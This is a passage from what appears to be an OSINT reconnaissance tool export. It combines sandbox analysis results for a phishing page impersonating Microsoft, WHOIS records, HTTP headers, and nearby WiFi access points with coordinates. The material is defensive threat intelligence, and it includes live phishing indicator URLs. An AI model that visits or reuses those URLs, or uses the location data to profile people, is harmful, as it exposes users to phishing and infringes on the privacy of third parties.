"edge_tracking_page_validator.js" has type "Unknown"- Location: [%TEMP%\\7052_1268572528\\edge_tracking_page_validator.js]- [targetUID: 00000000-00007052]\n "shopping_iframe_driver.js" has type "Unknown"- Location: [%TEMP%\\7052_1268572528\\shopping_iframe_driver.js]- [targetUID: 00000000-00007052]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "3.0.0.8" found in string ""version": "3.0.0.8""\n Potential IP "10.34.0.45" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.45"\n Potential IP "10.34.0.45" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.45\\LICENSE"\n Potential IP "3.0.0.8" found in string "\xef\xbb\xbf{ "description": "AutofillCore data component", "name": "AutofillCore", "version": "3.0.0.8"}"\n Potential IP "5.1.0.0 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | permissions-policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=qVGOB1rQJjQIM8j8t5Spm5SzuRznIdJDuYO5Jbpn3fZk%2BJxIqln47OJIYIKFh9H9g0ehIc6QmUjGxpPhNXDavBCNcEEJOQv%2BvWtEqWQkF532xy%2FfGHFy%2BS9fyHqoDn0%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6071cb5443bc-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 0 | 0 | 2 | 0 | None | +74955801111 | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | prettyflyforawifi 5 (Net ID: 00:01:9F:34:7C:4C) | 34.0544, -118.244 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | kathyncrew (Net ID: 00:05:3C:08:76:43) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.214): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:03:35 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00indahouse.github.io |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | +14806242598 |
| 2023-05-12 03:00:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.18): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:53:17 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://github.com/twbs/bootstrap/blob/master/license)', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://dweb.link/ipfs/qmerdaetkpyon7z2jmmdsyxapkznfhrbf42ztgnxgcjtbq', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://portaili.github.io/micrcosoft.github.io', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2744"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_ab8_IE_EarlyTabStart_0xc64_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_ab8_ConnHashTable<2744>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_ab8_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_ab8_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_ab8_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "IsoScope_ab8_IE_EarlyTabStart_0xc64_Mutex"\n "IsoScope_ab8_IESQMMUTEX_0_331"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:80"\n "185.199.109.153:443"\n "192.229.173.207:443"\n "104.17.25.14:443"\n "104.18.10.207:443"\n "142.251.46.234:443"\n "104.18.11.207:443"\n "151.101.1.229:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"portaili.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ajax.googleapis.com"\n "cdn.jsdelivr.net"\n "cdnjs.cloudflare.com"\n "maxcdn.bootstrapcdn.com"\n "portaili.github.io"\n "query.prod.cms.msn.com"\n "stackpath.bootstrapcdn.com"\n "teredo.ipv6.microsoft.com"\n "www.w3schools.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"microsoft_logo_ed9c9eb0dce17d752bedea6b5acda6d9_1_.png" has type "PNG image data 108 x 24 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{36b53e8b-eba4-11ed-a4f7-08002766a00c}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df3c90c2a7f75f2b91.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df44c8c92dba11d115.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{36b53e89-eba4-11ed-a4f7-08002766a00c}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df3c90c2a7f75f2b91.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{36b53e8b-eba4-11ed-a4f7-08002766a00c}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df44c8c92dba11d115.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{36b53e89-eba4-11ed-a4f7-08002766a00c}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "fa-solid-900_1_.ttf" has type "TrueType Font data 10 tables 1st "OS/2" 22 names Macintosh Copyright (c) Font AwesomeVersion 769.01171875 (Font Awesome version: 6.1.1)FontAwesome6Free-So"- [targetUID: N/A]\n "micrcosoft.github_1_.htm" has type "HTML document ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "all.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "jquery.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "fa-regular-400_1_.ttf" has type "TrueType Font data 10 tables 1st "OS/2" 22 names Macintosh"- [targetUID: N/A]\n "bootstrap.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "w3_1_.css" has type "UTF-8 Unicode (with BOM) text"- [targetUID: N/A]\n "popper.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002744]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFF2E35B1698EDE394.TMP" has type "data"- Location: [%TEMP%\\~DFF2E35B1698EDE394.TMP]- [targetUID: 00000000-00002744]\n "~DF3C90C2A7F75F2B91.TMP" has type "data"- Location: [%TEMP%\\~DF3C90C2A7F75F2B91.TMP]- [targetUID: 00000000-00002744]\n "~DF44C8C92DBA11D115.TMP" has type "data"- Location: [%TEMP%\\~DF44C8C92DBA11D115.TMP]- [targetUID: 00000000-00002744]\n "~DF4FE4EBD509D90D4A.TMP" has type "data"- Location: [%TEMP%\\~DF4FE4EBD509D90D4A.TMP]- [targetUID: 00000000-00002744]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00002744]\n "_36B53E8B-EBA4-11ED-A4F7-08002766A00C_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._36B53E89-EBA4-11ED-A4F7-08002766A00C_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_3FDD343E-EBA4-11ED-A4F7-08002766A00C_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_4_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "jquery.session.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "microsoft_logo_ed9c9eb0dce17d752bedea6b5acda6d9_1_.png" has type "PNG image data 108 x 24 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "1ZCAIK0V.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1ZCAIK0V.txt]- [targetUID: 00000000-00002744]\n "7X6VIL59.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7X6VIL59.txt]- [targetUID: 00000000-00002744]\n "4QSK8L0L.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4QSK8L0L.txt]- [targetUID: 00000000-00002744]\n "W2EMEB4O.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\W2EMEB4O.txt]- [targetUID: 00000000-00002744]\n "XSDFEMWJ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\XSDFEMWJ.txt]- [targetUID: 00000000-00002744]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "micrcosoft.github_2_.htm" has type "HTML document ASCII text with CRLF line | 185.199.109.153 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet55FA (Net ID: 00:01:36:59:55:F8) | 37.780462,-122.390564 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ENHLG (Net ID: 00:01:36:5B:37:00) | 37.780462,-122.390564 |
| 2023-05-12 03:08:54 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.70 | 34.74.170.74 |
| 2023-05-12 02:47:10 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://thewiki.moe/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "185.199.109.133:443"\n "162.159.133.233:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarF16C.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarF19D.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_970_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "UpdatingNewTabPageData"\n "IsoScope_970_IESQMMUTEX_0_303"\n "IsoScope_970_ConnHashTable<2416>_HashTable_Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_970_IESQMMUTEX_0_519"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_970_IE_EarlyTabStart_0xde4_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2416"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_970_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2416"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabF18D.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabF15C.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003360]\n "DREGU5ZL.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DREGU5ZL.txt]- [targetUID: 00000000-00002416]\n "CST1DE17.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CST1DE17.txt]- [targetUID: 00000000-00002416]\n "_289FBDBF-BAAA-11ED-BDE7-080027EC9596_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "214677895-b5497a9f-b78c-4c26-8ef3-880594c67e7a_1_.png" has type "PNG image data 950 x 530 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "VQLDZC3M.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\VQLDZC3M.txt]- [targetUID: 00000000-00002416]\n "RLS6I7B1.htm" has type "HTML document ASCII text with very long lines"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\RLS6I7B1.htm]- [targetUID: 00000000-00003360]\n "670S4DMD.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\670S4DMD.txt]- [targetUID: 00000000-00002416]\n "~DF481D1D446E1EA5B6.TMP" has type "data"- Location: [%TEMP%\\~DF481D1D446E1EA5B6.TMP]- [targetUID: 00000000-00002416]\n "_DAE5D358-BAAA-11ED-BDE7-080027EC9596_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "QQF9N5N7.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QQF9N5N7.txt]- [targetUID: 00000000-00003360]\n "CabF18D.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabF18D.tmp]- [targetUID: 00000000-00003360]\n "widget_1_.png" has type "PNG image data 320 x 76 8-bit/color RGB non-interlaced"- [targetUID: N/A]\n "VBEQR8NB.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\VBEQR8NB.txt]- [targetUID: 00000000-00003360]\n "RecoveryStore._289FBDBD-BAAA-11ED-BDE7-080027EC9596_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "lunr_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "retype_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://thewiki.moe/"\n Pattern match: "https://thewiki.moe"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /resources/js/lunr.js?v=2.4.0.730670946851 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://thewiki.moe/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: thewiki.moe\nDNT: 1\nConnection: Keep-Alive"\n "GET /resources/js/config.js?v=2.4.0.730670946851 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://thewiki.moe/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: thewiki.moe\nDNT: 1\nConnection: Keep-Alive"\n "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: thewiki.moe\nDNT: 1\nConnection: Keep-Alive"\n "GET /resources/css/retype.css?v=2.4.0.730670946851 HTTP/1.1\nAccept: text/css, */*\nReferer: https://thewiki.moe/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: thewiki.moe\nDNT: 1\nConnection: Keep-Alive"\n "GET /resources/js/retype.js?v=2.4.0 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://thewiki.moe/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; 